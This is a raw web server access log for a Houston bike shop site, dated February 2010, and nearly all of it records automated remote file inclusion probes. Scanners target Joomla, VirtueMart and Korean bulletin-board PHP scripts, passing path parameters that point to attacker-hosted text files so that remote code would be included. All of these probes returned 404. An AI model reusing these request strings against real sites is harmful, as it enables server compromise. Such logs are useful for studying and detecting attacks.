186.28.232.13 - - [09/Feb/2010:21:33:16 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
213.171.37.206 - - [09/Feb/2010:21:34:31 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "houstonbikeshop.com"
213.171.37.206 - - [09/Feb/2010:21:34:31 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "houstonbikeshop.com"
213.171.37.206 - - [09/Feb/2010:21:34:32 -0800] "GET /logs/access.log%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "houstonbikeshop.com"
186.28.232.13 - - [09/Feb/2010:21:36:05 -0800] "GET /logs/access.log%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
218.38.136.126 - - [09/Feb/2010:21:39:34 -0800] "GET /logs/access.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.136.126 - - [09/Feb/2010:21:39:34 -0800] "GET /logs///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.136.126 - - [09/Feb/2010:21:39:34 -0800] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.136.126 - - [09/Feb/2010:21:40:00 -0800] "GET /logs/access.log%20%20///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.136.126 - - [09/Feb/2010:21:40:00 -0800] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.136.126 - - [09/Feb/2010:21:40:00 -0800] "GET /logs///bbs//skin/zero_vote/ask_password.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.171.37.206 - - [09/Feb/2010:21:40:06 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "houstonbikeshop.com"
67.195.115.111 - - [09/Feb/2010:21:49:57 -0800] "GET /bullitinboard/viewtopic.php?p=4303 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
222.122.25.99 - - [09/Feb/2010:21:51:25 -0800] "GET /logs/access.log/administrator/components/com_jce/config.kce.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
222.122.25.99 - - [09/Feb/2010:21:51:26 -0800] "GET /administrator/components/com_jce/config.kce.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
222.122.25.99 - - [09/Feb/2010:21:51:26 -0800] "GET /logs/administrator/components/com_jce/config.kce.php?mosConfig.absolute.path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
208.80.193.28 - - [09/Feb/2010:22:01:08 -0800] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; VNIE6.0; FunWebProducts; .NET CLR 1.1.4322; MEGAUPLOAD 1.0)" "bicyclestoreshouston.com"
222.122.25.99 - - [09/Feb/2010:22:05:51 -0800] "GET /logs/access.log/components/com_virtuemart/errors.php?error=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
222.122.25.99 - - [09/Feb/2010:22:05:52 -0800] "GET /components/com_virtuemart/errors.php?error=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
222.122.25.99 - - [09/Feb/2010:22:05:52 -0800] "GET /logs/components/com_virtuemart/errors.php?error=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
218.38.136.126 - - [09/Feb/2010:22:15:27 -0800] "GET //bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.136.126 - - [09/Feb/2010:22:15:27 -0800] "GET /logs///bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.136.126 - - [09/Feb/2010:22:15:27 -0800] "GET /logs/access.log%20%20///bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:22:17:18 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:22:17:18 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:22:17:18 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.136.126 - - [09/Feb/2010:22:24:01 -0800] "GET /logs///bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.136.126 - - [09/Feb/2010:22:24:01 -0800] "GET //bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.136.126 - - [09/Feb/2010:22:24:01 -0800] "GET /logs/access.log%20%20///bbs//delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.116.103.96 - - [09/Feb/2010:22:24:59 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.116.103.96 - - [09/Feb/2010:22:24:59 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.116.103.96 - - [09/Feb/2010:22:25:00 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.217.198.155 - - [09/Feb/2010:22:26:19 -0800] "GET /delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.217.198.155 - - [09/Feb/2010:22:26:19 -0800] "GET /logs/access.log%20%20//delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.217.198.155 - - [09/Feb/2010:22:26:19 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.217.198.155 - - [09/Feb/2010:22:26:20 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.217.198.155 - - [09/Feb/2010:22:26:20 -0800] "GET /logs/access.log%20%20//delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.217.198.155 - - [09/Feb/2010:22:26:21 -0800] "GET /delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:22:29:15 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:22:29:15 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:22:29:20 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
58.230.162.220 - - [09/Feb/2010:22:30:33 -0800] "GET /logs/access.log%20%20//delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
58.230.162.220 - - [09/Feb/2010:22:30:33 -0800] "GET /delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
58.230.162.220 - - [09/Feb/2010:22:30:33 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.116.103.96 - - [09/Feb/2010:22:30:35 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.116.103.96 - - [09/Feb/2010:22:30:35 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
58.230.162.220 - - [09/Feb/2010:22:30:42 -0800] "GET /delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
58.230.162.220 - - [09/Feb/2010:22:30:42 -0800] "GET /logs/access.log%20%20//delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
58.230.162.220 - - [09/Feb/2010:22:30:42 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.116.103.96 - - [09/Feb/2010:22:30:44 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.245.1 - - [09/Feb/2010:22:30:49 -0800] "GET /logs//bbs/skin/ggambo7002_board/*=http://www.czity.com/images/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.245.1 - - [09/Feb/2010:22:30:49 -0800] "GET /bbs/skin/ggambo7002_board/*=http://www.czity.com/images/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.245.1 - - [09/Feb/2010:22:30:49 -0800] "GET /logs/access.log%20%20//bbs/skin/ggambo7002_board/*=http://www.czity.com/images/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.245.1 - - [09/Feb/2010:22:31:43 -0800] "GET /logs//bbs/skin/ggambo7002_board/*=http://www.czity.com/images/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.245.1 - - [09/Feb/2010:22:31:43 -0800] "GET /bbs/skin/ggambo7002_board/*=http://www.czity.com/images/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.245.1 - - [09/Feb/2010:22:31:43 -0800] "GET /logs/access.log%20%20//bbs/skin/ggambo7002_board/*=http://www.czity.com/images/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
203.250.124.252 - - [09/Feb/2010:22:32:19 -0800] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "houstonbikeshop.com"
203.250.124.252 - - [09/Feb/2010:22:32:19 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "houstonbikeshop.com"
203.250.124.252 - - [09/Feb/2010:22:32:20 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:22:32:29 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:22:32:34 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:22:32:34 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.179.177.169 - - [09/Feb/2010:22:32:59 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://bbs.chatlist.net/bbs19/.coke/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.179.177.169 - - [09/Feb/2010:22:32:59 -0800] "GET /logs/access.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://bbs.chatlist.net/bbs19/.coke/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.179.177.169 - - [09/Feb/2010:22:32:59 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://bbs.chatlist.net/bbs19/.coke/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:22:33:28 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:22:33:28 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:22:33:31 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.108.61.176 - - [09/Feb/2010:22:33:33 -0800] "GET /logs//login.php?board_skin_path=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.108.61.176 - - [09/Feb/2010:22:33:33 -0800] "GET /login.php?board_skin_path=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.108.61.176 - - [09/Feb/2010:22:33:33 -0800] "GET /logs/access.log//login.php?board_skin_path=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.235.54.152 - - [09/Feb/2010:22:42:12 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.visionovni.com.ar/xoops_data/configs/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
64.235.54.152 - - [09/Feb/2010:22:42:12 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.visionovni.com.ar/xoops_data/configs/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
64.235.54.152 - - [09/Feb/2010:22:42:13 -0800] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.visionovni.com.ar/xoops_data/configs/yes.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
210.116.103.96 - - [09/Feb/2010:22:44:15 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.245.1 - - [09/Feb/2010:22:46:07 -0800] "GET /logs/access.log//bbs/skin/ggambo7002_board/*=http://www.czity.com/images/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.179.177.169 - - [09/Feb/2010:22:46:34 -0800] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://bbs.chatlist.net/bbs19/.coke/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:22:47:36 -0800] "GET /logs/access.log%20%20//delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:22:47:36 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:22:47:36 -0800] "GET /delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:22:49:00 -0800] "GET /delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:22:49:00 -0800] "GET /logs/access.log%20%20//delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:22:49:00 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.116.103.96 - - [09/Feb/2010:22:49:16 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.245.1 - - [09/Feb/2010:22:49:31 -0800] "GET /logs/access.log//bbs/skin/ggambo7002_board/*=http://www.czity.com/images/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.179.177.169 - - [09/Feb/2010:22:52:02 -0800] "GET /logs/access.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.earlywarninginc.com/.injek/dapat.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
210.179.177.169 - - [09/Feb/2010:22:52:02 -0800] "GET /logs/access.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.earlywarninginc.com/.injek/dapat.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
210.179.177.169 - - [09/Feb/2010:22:52:02 -0800] "GET /logs/access.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.earlywarninginc.com/.injek/dapat.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
210.179.177.169 - - [09/Feb/2010:22:52:06 -0800] "GET /logs/access.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.earlywarninginc.com/.injek/dapat.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
210.179.177.169 - - [09/Feb/2010:22:52:08 -0800] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.earlywarninginc.com/.injek/dapat.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
210.179.177.169 - - [09/Feb/2010:22:52:08 -0800] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.earlywarninginc.com/.injek/dapat.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
210.179.177.169 - - [09/Feb/2010:22:52:08 -0800] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.earlywarninginc.com/.injek/dapat.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
210.179.177.169 - - [09/Feb/2010:22:52:12 -0800] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.earlywarninginc.com/.injek/dapat.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
210.179.177.169 - - [09/Feb/2010:22:52:13 -0800] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.earlywarninginc.com/.injek/dapat.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
210.179.177.169 - - [09/Feb/2010:22:52:13 -0800] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.earlywarninginc.com/.injek/dapat.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
210.179.177.169 - - [09/Feb/2010:22:52:13 -0800] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.earlywarninginc.com/.injek/dapat.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
210.179.177.169 - - [09/Feb/2010:22:52:14 -0800] "GET /logs/access.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://codemasters.jp/imgupload/.injek/idtempek.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
210.179.177.169 - - [09/Feb/2010:22:52:17 -0800] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.earlywarninginc.com/.injek/dapat.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
210.179.177.169 - - [09/Feb/2010:22:52:20 -0800] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://codemasters.jp/imgupload/.injek/idtempek.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
210.179.177.169 - - [09/Feb/2010:22:52:25 -0800] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://codemasters.jp/imgupload/.injek/idtempek.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
210.179.177.169 - - [09/Feb/2010:22:52:30 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://bbs.chatlist.net/bbs19/.coke/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.179.177.169 - - [09/Feb/2010:22:52:30 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://bbs.chatlist.net/bbs19/.coke/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.179.177.169 - - [09/Feb/2010:22:52:30 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://bbs.chatlist.net/bbs19/.coke/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
201.36.173.93 - - [09/Feb/2010:22:52:47 -0800] "GET /write_update.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
201.36.173.93 - - [09/Feb/2010:22:52:50 -0800] "GET /logs//write_update.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
201.36.173.93 - - [09/Feb/2010:22:52:52 -0800] "GET /logs/access.log//write_update.php?board_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.179.177.169 - - [09/Feb/2010:22:53:01 -0800] "GET /logs/access.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://codemasters.jp/imgupload/.injek/idtempek.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
210.179.177.169 - - [09/Feb/2010:22:53:06 -0800] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://codemasters.jp/imgupload/.injek/idtempek.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
210.179.177.169 - - [09/Feb/2010:22:53:12 -0800] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://codemasters.jp/imgupload/.injek/idtempek.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:22:53:27 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:22:53:28 -0800] "GET /translations/Portuguese_BR.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:22:53:32 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:22:53:32 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:22:56:08 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.93.147.154 - - [09/Feb/2010:22:56:08 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
